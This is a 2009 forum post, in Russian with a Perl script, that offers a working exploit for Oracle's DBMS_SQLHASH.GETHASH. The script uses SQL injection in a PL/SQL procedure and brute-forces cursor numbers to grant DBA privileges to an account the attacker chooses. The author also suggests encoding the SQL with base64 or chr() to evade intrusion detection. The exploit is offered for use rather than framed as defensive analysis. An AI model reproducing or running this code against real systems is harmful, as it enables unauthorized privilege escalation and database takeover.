Oracle DBMS_SQLHASH.GETHASH exploit (perl)

Discussion in 'Уязвимости' started by [ DSU ], 4 Dec 2009.

  1. [ DSU ]

    [ DSU ] Elder - Старейшина

    Joined:
    22 Oct 2007
    Messages:
    103
    Likes Received:
    96
    Reputations:
    88
    Написал простенький сплоит использующий уязвимость в DBMS_SQLHASH.GETHASH, сплоиту для работы требуется sql инъекция в pl/sql процедуре (обычно на Oracle Application server, там и принадлежат такие процедуры по дефолту пользователю которого нам достаточно). В принципе можно спросить зачем нам сплоит если есть инъекция? Я отвечу, что часто в таких процедурах идет простой sql select/update/insert, а в них мы можем только простой sql использовать. Данный сплоит позволяет выполнить pl/sql имея при этом только инъекцию в процедуре выполняющей скажем select и права только create_session.
    Для того чтоб использовать данный сплоит и обойти IDS можно немного переписать sql и использовать utl_encode.base64_decode() или chr() выбирайте сами как вам больше нравится благо оракл предоставляет огромное количество процедур/функций для работы с текстом.

    Сплоит работает по принципу:

    1. Вставляет нужный нам код.

    2. Брут номера курсора который бо дефолту идет =<300

    Mirror: http://pastebin.org/58184
    Code:
        #!/usr/bin/perl
        #Coded by dsu http://dsu.com.ua 2009
        #Vulnerability discovered by David Litchfield
    
        use LWP::UserAgent;
        $ua = new LWP::UserAgent;
        $ua->agent("MSIE 8" . $ua->agent);
        my $url = $ARGV[0];    #url of injectable param
        my $user = $ARGV[1];   # account to grant dba
        my $curs = 300; #maximal cursor number allowed by default
        my $sql="DDD''||DBMS_SQLHASH.GETHASH(''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''GRANT DBA TO ".$user."''''; COMMIT; END;'',1,1)||''DDDD";
        if (!$ARGV[0] or !$ARGV[0])
        {
            print "##########################################################################\r\n";
            print "#You need a create session privs and pl/sql procedure with sql-injection #\r\n";
            print "#Use: exp.pl http://example.org/e.cgi?param= scott                       #\r\n";
            print "##########################################################################\r\n";
         exit;
        }
        $ex = $url."exploit".$sql;
        print "Inject pl/sql \r\n";
        my $res1 = $ua->get($ex);
        print "Try to execute cursor it take several time\r\n";
        for( $i=1; $i < $curs; $i++ )
        {
                        my $res = $ua->get($url."tst''||(SELECT DBMS_SQL.EXECUTE(".$i.") FROM DUAL)||''tst");
        }
        print "executted";
     
    #1 [ DSU ], 4 Dec 2009
    Last edited: 4 Dec 2009
    5 people like this.